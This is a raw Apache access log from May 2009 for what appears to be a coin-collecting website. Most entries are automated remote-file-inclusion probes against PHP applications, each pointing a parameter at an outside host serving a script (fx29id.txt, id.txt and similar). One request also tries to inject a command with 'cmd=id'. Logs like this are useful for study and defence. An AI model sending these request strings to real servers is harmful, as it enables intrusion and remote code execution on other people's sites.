85.214.83.196 - - [26/May/2009:08:10:51 -0500] "GET /logs/access_log.1235001600//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.206 - - [26/May/2009:08:11:17 -0500] "GET /logs/access_log.1107993600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [26/May/2009:08:11:19 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:08:11:19 -0500] "GET /logs/access_log.1236643200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:08:11:19 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.209 - - [26/May/2009:08:11:48 -0500] "GET /logs/access_log.1120089600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [26/May/2009:08:11:48 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:08:11:51 -0500] "GET /?_zb_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:08:11:51 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:08:11:52 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:08:11:52 -0500] "GET /logs/?_zb_path=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:08:12:01 -0500] "GET /logs/access_log.1236038400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:13:12 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:13:12 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:13:12 -0500] "GET /?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:13:13 -0500] "GET /logs/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
85.214.83.196 - - [26/May/2009:08:17:42 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:08:19:11 -0500] "GET //admin/include/lib.module.php?mod_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:08:19:11 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.79.12.5 - - [26/May/2009:08:19:15 -0500] "GET /logs/access_log.1229904000//include/admin.lib.inc.php?site_path=http://pacificdecor.org/vnc/fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.120.234.169 - - [26/May/2009:08:19:16 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.106.205 - - [26/May/2009:08:23:20 -0500] "GET /logs/ HTTP/1.1" 200 190841 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
35.8.197.50 - - [26/May/2009:08:31:46 -0500] "GET /errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
35.8.197.50 - - [26/May/2009:08:31:46 -0500] "GET /logs/errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
35.8.197.50 - - [26/May/2009:08:31:46 -0500] "GET /logs/access_log.1238889600/errors.php?error=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:08:33:43 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:08:33:43 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:08:33:43 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.73.161.62 - - [26/May/2009:08:35:07 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://alibi-pcportable.fr//administrator/help/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:36:01 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:36:01 -0500] "GET /?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:36:01 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:36:02 -0500] "GET /logs/?_zb_path=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:51 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:51 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:51 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:54 -0500] "GET /inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:54 -0500] "GET /logs/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:54 -0500] "GET /logs/access_log.1239580800/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:36:54 -0500] "GET /logs/access_log.1238112000/inc/header.php/step_one.php?server_inc=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:08:36:55 -0500] "GET /logs/access_log.1235001600//admin/spaw/spaw_control.class.php?spaw_root=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:08:36:55 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:08:36:55 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
77.232.66.198 - - [26/May/2009:08:36:55 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.wizard.com.br/fx29id.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.208.73.49 - - [26/May/2009:08:37:17 -0500] "GET /logs/access_log.1236816000/?custompluginfile[]=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.208.73.49 - - [26/May/2009:08:37:17 -0500] "GET /?custompluginfile[]=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
74.208.73.49 - - [26/May/2009:08:37:18 -0500] "GET /logs/?custompluginfile[]=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
74.208.73.49 - - [26/May/2009:08:37:23 -0500] "GET /logs/access_log.1233014400/?custompluginfile[]=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:08:40:57 -0500] "GET /?_zb_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:08:40:57 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:08:40:58 -0500] "GET /logs/?_zb_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
207.44.232.81 - - [26/May/2009:08:40:58 -0500] "GET /logs/access_log.1236470400/?_zb_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:42:21 -0500] "GET /logs//reports/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:42:21 -0500] "GET //reports/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 401 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:42:21 -0500] "GET /logs/access_log.1239926400//reports/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 428 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:42:32 -0500] "GET /logs/access_log.1239408000//reports/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 428 "-""Mozilla/5.0"
77.79.12.5 - - [26/May/2009:08:42:40 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
203.94.155.59 - - [26/May/2009:08:42:40 -0500] "GET /logs/access_log.1236816000/?custompluginfile[]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
203.94.155.59 - - [26/May/2009:08:42:40 -0500] "GET /?custompluginfile[]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.94.155.59 - - [26/May/2009:08:42:42 -0500] "GET /logs/?custompluginfile[]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
77.79.12.5 - - [26/May/2009:08:42:44 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
77.79.12.5 - - [26/May/2009:08:42:44 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
203.94.155.59 - - [26/May/2009:08:43:24 -0500] "GET /logs/access_log.1233014400/?custompluginfile[]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:08:43:57 -0500] "GET /logs/access_log.1236470400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.79.12.5 - - [26/May/2009:08:43:58 -0500] "GET /logs/access_log.1242518400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:44:48 -0500] "GET /logs/access_log.1235174400//components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:44:48 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:44:48 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:45:17 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:45:17 -0500] "GET /logs/access_log.1235174400//components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.116.34.106 - - [26/May/2009:08:45:17 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
77.221.130.2 - - [26/May/2009:08:47:09 -0500] "GET /logs/includes/db_adodb.php?baseDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.130.2 - - [26/May/2009:08:47:09 -0500] "GET /includes/db_adodb.php?baseDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
77.221.130.2 - - [26/May/2009:08:47:22 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.2 - - [26/May/2009:08:47:22 -0500] "GET //includes/db_adodb.php?baseDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
201.51.25.114 - - [26/May/2009:08:51:03 -0500] "GET /index.php?meio=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.0" 404 280 "-""-"
65.55.106.138 - - [26/May/2009:08:51:26 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.143.3.188 - - [26/May/2009:08:52:32 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
174.143.3.188 - - [26/May/2009:08:52:32 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
174.143.3.188 - - [26/May/2009:08:52:32 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.143.3.188 - - [26/May/2009:08:52:32 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:08:52:54 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:08:52:54 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:08:52:55 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:08:52:55 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:08:55:13 -0500] "GET /logs/access_log.1228608000/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 355 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.106.67.146 - - [26/May/2009:08:55:13 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [26/May/2009:08:55:16 -0500] "GET /logs/access_log.1228608000/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 355 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [26/May/2009:08:55:16 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
82.40.7.15 - - [26/May/2009:08:58:14 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 200 2427 "http://www.google.co.uk/search?q=spanish+piece+of+eight+cob+Grade&hl=en&rlz=1T4RNWI_enGB313GB313&start=30&sa=N""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:14 -0500] "GET /35bge.jpg HTTP/1.1" 200 2660 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:15 -0500] "GET /coin_chain_cross_05.jpg HTTP/1.1" 200 66714 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:16 -0500] "GET /coin_arms_02.jpg HTTP/1.1" 200 125370 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:16 -0500] "GET /coin_chain_cross_07.jpg HTTP/1.1" 200 67295 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:16 -0500] "GET /chain_clasp_04.jpg HTTP/1.1" 200 62938 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
82.40.7.15 - - [26/May/2009:08:58:16 -0500] "GET /chain_03.jpg HTTP/1.1" 200 112821 "http://fortpit.pconline.com/silver_spanish_piece_of_eight.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.106.67.146 - - [26/May/2009:09:00:37 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:09:00:37 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:09:00:37 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.23.200.54 - - [26/May/2009:09:01:22 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [26/May/2009:09:01:22 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
94.23.200.54 - - [26/May/2009:09:01:22 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:01:31 -0500] "GET //sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:09:01:40 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://largeface.com/gnuboard4/tail/fid.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [26/May/2009:09:01:54 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:03:25 -0500] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:03:25 -0500] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.16.193.132 - - [26/May/2009:09:03:25 -0500] "GET /logs/access_log.1236297600//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.106.67.146 - - [26/May/2009:09:04:03 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:09:04:05 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:09:04:06 -0500] "GET /logs/include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.67.146 - - [26/May/2009:09:04:06 -0500] "GET /include/db/ShopCategory/left_shopCategory.php?skin_site_path=http://auralmoon.com/albumcovers/idomila.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
91.142.209.134 - - [26/May/2009:09:05:07 -0500] "GET /logs//sphider/search.php?include_dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
